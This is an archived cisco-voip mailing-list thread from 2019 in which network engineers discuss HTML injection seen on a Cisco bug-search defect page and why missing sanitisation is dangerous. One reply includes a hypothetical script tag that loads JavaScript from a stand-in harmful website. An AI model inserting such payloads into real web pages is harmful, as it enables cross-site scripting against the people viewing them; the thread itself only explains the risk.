[cisco-voip] Bug Search Code Injection
Anthony Holloway
avholloway+cisco-voip at gmail.com
Tue Aug 20 13:53:42 EDT 2019
Basically someone typed in some HTML code into the bug description, and
when my browser received/rendered the page content, my browser saw this
code as code it needed to execute, hence the <textarea> text box was
rendered as opposed to the text "<textarea>" just being shown on the page
(like how it is in the title.
Now, while this page is not doing anything harmful at the moment, it's not
impossible for the code to have been:
<script>https://myharmfulwebsite.com/code-you-dont-want.js</script>
Then my browser would have downloaded and executed that.
I'm no hacker, but I know this can't be good.
Also, if nothing else, it ruins the value of the bug itself, because people
like you don't know what the hell it's trying to tell you. Know what I
mean man?
On Tue, Aug 20, 2019 at 12:42 PM Lelio Fulgenzi <lelio at uoguelph.ca> wrote:
> Ok – for those of us less knowledgeable, how exactly is this “code
> injection” ?
>
>
>
>
>
>
>
> ---
>
> *Lelio Fulgenzi, B.A.* | Senior Analyst
>
> Computing and Communications Services | University of Guelph
>
> Room 037 Animal Science & Nutrition Bldg | 50 Stone Rd E | Guelph, ON |
> N1G 2W1
>
> 519-824-4120 Ext. 56354 | lelio at uoguelph.ca
>
>
>
> www.uoguelph.ca/ccs | @UofGCCS on Instagram, Twitter and Facebook
>
>
>
> [image: University of Guelph Cornerstone with Improve Life tagline]
>
>
>
> *From:* cisco-voip <cisco-voip-bounces at puck.nether.net> *On Behalf Of *Anthony
> Holloway
> *Sent:* Tuesday, August 20, 2019 1:38 PM
> *To:* Norton, Mike <mikenorton at pwsd76.ab.ca>
> *Cc:* Cisco VoIP Group <cisco-voip at puck.nether.net>
> *Subject:* Re: [cisco-voip] Bug Search Code Injection
>
>
>
> Exactly. Like there might be a feature disabled for preventing code
> injection on the site as a whole, and not all code injection displays
> something like that. In fact, I'd wager an attack via code injection would
> go unnoticed by the user all together.
>
>
>
> On Tue, Aug 20, 2019 at 12:08 PM Norton, Mike <mikenorton at pwsd76.ab.ca>
> wrote:
>
> Used to be that reading documentation articles about “null” – e.g. null
> routes, Null 0 interface, etc. – would give some rather, uh, “interesting”
> results in the related community discussions box off to the side of the
> article. Agreed it is rather concerning. Basically every language has
> standard functions for properly sanitizing/escaping text so there is no
> excuse other than sloppiness... which makes one wonder what else they are
> sloppy with.
>
> -mn
>
> *From:* cisco-voip <cisco-voip-bounces at puck.nether.net> *On Behalf Of *Anthony
> Holloway
> *Sent:* August 20, 2019 8:35 AM
> *To:* Cisco VoIP Group <cisco-voip at puck.nether.net>
> *Subject:* [cisco-voip] Bug Search Code Injection
>
>
>
> Looks like I stumbled across some code injection on the following defect
> page:
>
>
>
> https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvq27976
>
>
>
> It's innocent enough, but concerning that it's even possible.
>
>
>
> [image: image.png]
>
> _______________________________________________
> cisco-voip mailing list
> cisco-voip at puck.nether.net
> https://puck.nether.net/mailman/listinfo/cisco-voip
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://puck.nether.net/pipermail/cisco-voip/attachments/20190820/19b4bf5b/attachment.htm>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image001.png
Type: image/png
Size: 1297 bytes
Desc: not available
URL: <https://puck.nether.net/pipermail/cisco-voip/attachments/20190820/19b4bf5b/attachment.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image002.png
Type: image/png
Size: 72638 bytes
Desc: not available
URL: <https://puck.nether.net/pipermail/cisco-voip/attachments/20190820/19b4bf5b/attachment-0001.png>
More information about the cisco-voip
mailing list